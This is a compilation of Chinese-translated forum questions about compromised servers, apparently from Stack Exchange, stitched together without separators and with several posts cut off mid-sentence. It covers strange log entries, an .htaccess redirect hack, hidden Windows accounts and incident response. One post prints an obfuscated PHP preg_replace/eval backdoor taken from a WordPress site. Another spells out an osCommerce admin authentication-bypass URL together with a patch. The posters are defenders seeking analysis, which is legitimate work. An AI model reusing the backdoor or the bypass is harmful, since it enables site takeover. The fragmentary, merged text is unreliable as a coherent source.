我正在构建某种 webapp,目前整个事情都在我的机器上运行。我正在整理我的日志,发现了几个让我有点偏执的“奇怪”日志条目。开始:
***.***.***.** - - [19/Dec/2010:19:47:47 +0100] "\x99\x91g\xca\xa8" 501 1054
**.***.***.** - - [19/Dec/2010:20:14:58 +0100] "<}\xdbe\x86E\x18\xe7\x8b" 501 1054
**.**.***.*** - - [21/Dec/2010:15:28:14 +0100] "J\xaa\x9f\xa3\xdd\x9c\x81\\\xbd\xb3\xbe\xf7\xa6A\x92g'\x039\x97\xac,vC\x8d\x12\xec\x80\x06\x10\x8e\xab7e\xa9\x98\x10\xa7" 501 1054
该死的……这是什么?!
我在客户的 WordPress 驱动的网站中发现了一个有问题的字符串,我只想知道它的作用。
@preg_replace("\x40\50\x2e\53\x29\100\x69\145","\x65\166\x61\154\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b","\x4c\62\x68\166\x62\127\x55\166\x64\62\x56\151\x4c\63\x56\172\x5a\130\x4a\172\x4c\172\x49\167\x4d\152\x6b\165\x59\155\x6c\156\x4e\151\x39\172\x61\130\x52\154\x63\171\x39\151\x61\127\x63\62\x4c\63\x42\61\x59\155\x78\160\x59\61\x39\157\x64\107\x31\163\x4c\62\x5a\166\x63\156\x56\164\x4c\62\x4a\151\x4c\127\x6c\165\x59\62\x78\61\x5a\107\x56\172\x4c\62\x70\172\x4c\62\x70\170\x64\127\x56\171\x65\123\x38\165\x59\62\x46\152\x61\107\x55\166\x4c\151\x55\64\x4d\152\x68\106\x4a\124\x41\167\x4d\124\x4d\154\x51\152\x68\107\x4d\171\x56\103\x51\172\x46\103\x4a\125\x49\171\x4d\153\x49\154\x4e\105\x59\61\x4e\167\x3d\75");
有人可以概述解码这个所需的步骤吗?我知道 preg_replace() 是什么,但我不知道如何解码函数的参数,或者 PHP 如何将它处理成可以使用的东西。
黑客在 .htaccess 文件中添加了一个代码,将所有搜索引擎流量重定向到恶意软件网站。我现在正在调查此事件并试图找出安全漏洞。我的情况和这个人的情况差不多——. htaccess被反复黑
这是来自 FTP 日志的信任尝试示例 -
Aug 6 02:43:31 sg2nlftpg002 [30887]: (?@91.220.0.19) [INFO] FTPUSER is now logged in
Aug 6 09:43:33 sg2nlftpg002 [30887]: (FTPUSER@91.220.0.19) [NOTICE] /home/content/81/7838581/html//.htaccess downloaded (846 bytes, 106.37KB/sec)
Aug 6 09:43:35 sg2nlftpg002 [30887]: (FTPUSER@91.220.0.19) [NOTICE] /home/content/81/7838581/html//.htaccess uploaded (1435 bytes, 3.32KB/sec)
Aug 6 09:43:35 sg2nlftpg002 [30887]: (FTPUSER@91.220.0.19) [INFO] Logout.
这与我的常规登录尝试明显不同 -
Aug 7 10:57:53 sg2nlftpg002 [11713]: session opened for local user FTPUSER from [my.ip.address]
Aug 7 10:58:28 sg2nlftpg002 [11713]: [FTPUSER] close "/home/content/81/7838581/html/.htaccess" bytes read 1435 written 0 …访问以下所有内容会将您带到登录屏幕:
http://mysite.com/admin/configuration.php
http://mysite.com/admin/login.php
但是,如果您访问(注意 url 字符串的最后两部分都是 .php):
http://mysite.com/admin/configuration.php/login.php
您可以看到配置屏幕及其所有数据!
此外,如果您附加一些 GET 变量,您甚至可以获得可编辑的字段:
http://mysite.com/admin/configuration.php/login.php?cID=1&action=edit
这里发生了什么?
我应该注意,这是在网站上使用称为 oscommerce 的绝对可怕的购物车。代码是处理的噩梦,但我现在坚持使用它。
基于以下 vstm 出色而准确的评论的修复:
这将在检查之前进行$current_page != FILENAME_LOGIN(大约在 /admin/includes/application_top.php 中的第 141-143 行)。请注意,这只是一个紧急补丁,因为真正的解决方案是永远不要使用 oscommerce,因为它就像妓女的腰带一样安全。
//$current_page = basename($PHP_SELF); //this is the default
$current_page = basename($_SERVER['SCRIPT_NAME']); //change that default to this
if ( ($current_page == FILENAME_LOGIN) && !tep_session_is_registered('redirect_origin') ) {
$current_page = FILENAME_DEFAULT;
$HTTP_GET_VARS = array();
}
如果有人尝试这样做,请不要忘记redirect_origin可能已经设置了会话变量,因此这似乎不起作用。只需取消设置并重试。
可能重复:
我的服务器被黑了 紧急情况
我正在尝试确定此 linex 网络服务器/openfire 服务器是否已被某种形式的恶意软件或黑客入侵。你能帮我确定这个服务器是否被黑了吗?
下面的日志片段来自运行 apache 的 linux 服务器。前几天安装在服务器上的moodle站点开始渲染apache默认页面。访问日志还显示了一些我不确定的活动。请参阅下面的日志。
85.190.0.3 - - [02/Apr/2012:13:31:01 -0600] "CONNECT 213.92.8.7:31204 HTTP/1.0" 405 303 "-" "-"
85.190.0.3 - - [02/Apr/2012:13:31:01 -0600] "CONNECT 213.92.8.7:31204 HTTP/1.0" 405 303 "-" "-"
99.41.69.92 - - [02/Apr/2012:13:33:35 -0600] "GET /files/externallibs.php HTTP/1.1" 404 306 "-" "curl/7.18.0 (x86_64-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1"
212.34.151.92 - - [02/Apr/2012:14:01:46 -0600] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
212.34.151.92 - - [02/Apr/2012:14:01:46 …我刚刚认识到,Windows隐藏一些特殊用户,如例如NT Authority\SYSTEM用户或者是在SQL Server安装后添加的用户(ReportServer$SQLEXPRESS,IIS_IURS,...)。我知道可以在特定用户的权限下执行应用程序,所以它工作正常。根据我的理解,用户处于活动状态,但在计算机启动时尝试登录时无法访问。Windows 也仅显示特定用户,因此 Windows 中必须有一个选项可以定义用户帐户是否应该可见。
为了我的兴趣,我试图让隐藏的用户帐户可见。经过几分钟的研究,我偶然发现了一个注册表黑客:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList. 出于某种原因,它在我的机器上不起作用。我还尝试重新启动计算机之类的东西。
但是 someshow Windows 必须有一个选项来隐藏用户。它在哪里?我搜索了几个小时并检查了所有可用的 Windows 选项 - 我找不到方法。我的目标是使NT Authority\SYSTEM从欢迎屏幕登录成为可能。我该怎么做,窗户在哪里保护了这种可能性?为什么不net users显示其他用户(我的、访客、管理员除外)?
我们的一个网络项目被黑了。Malefactor 更改了项目中的一些模板文件和 web 框架的 1 个核心文件(它是著名的 php 框架之一)。我们通过 git 找到了所有损坏的文件并恢复了它们。所以现在我需要找到弱点。
我们很可能会说,这不是 ftp 或 ssh 密码劫持。主机提供商的支持专家(经过日志分析)说这是我们代码中的安全漏洞。
我的问题:
1) 我应该使用什么工具来查看 Apache 的访问和错误日志?(我们的服务器发行版是 Debian)。
2)能否在日志中写下可疑行检测的提示?也许是一些有用的正则表达式或技术的教程或入门?
3) 如何区分日志中的“正常用户行为”和可疑行为。
4) 有什么方法可以防止 Apache 中的攻击吗?
谢谢你的帮助。
当您刚刚检测到您的网站目前正受到试图渗透您网站的黑客攻击时,我的问题中没有包括拒绝服务,您会怎么做?是否有可遵循的最佳实践指南?
我找到了很多关于你被黑客攻击后做什么的帖子,但是当你受到攻击时你会做什么似乎并不清楚。
我主要谈论 IIS 和 ASP.net 站点,但问题与所有面向 Internet 的站点相关。
假设该站点位于防火墙后面,并且所有请求和信息都已记录。
我的想法是:
是否有任何其他建议的操作或最佳实践?
我运行来托管一些基本网站的 ubuntu VPS 似乎已被 apache 黑客攻击以进行比特币挖掘。
在我的 apache error.log 中,我看到以下内容。
[Sun Dec 15 06:27:58 2013] [notice] Apache/2.2.22 (Ubuntu) PHP/5.3.10-1ubuntu3.9 with
Suhosin-Patch configured -- resuming normal operations
[Sun Dec 15 06:27:58 2013] [info] Server built: Jul 12 2013 13:38:21
[Sun Dec 15 06:27:58 2013] [debug] prefork.c(1023): AcceptMutex: sysvsem (default: sysvsem
[Sun Dec 15 09:14:16 2013] [info] server seems busy, (you may need to increase StartServers, or Min/MaxSpareServers), spawning 8 children, there are 0 idle, and 18 total children
curl: try 'curl …有没有人对为什么 Angry IP Scanner (IPScan) 被如此多的防病毒供应商检测为病毒(hacktool),而 Nmap 和 Advanced IP Scanner 等类似工具却没有?我已经搜索了这个问题的答案,但一直找不到原因。这不是征求意见;我希望过去有人可能已经看到了这个问题的答案,并且可以将我链接到原因的来源。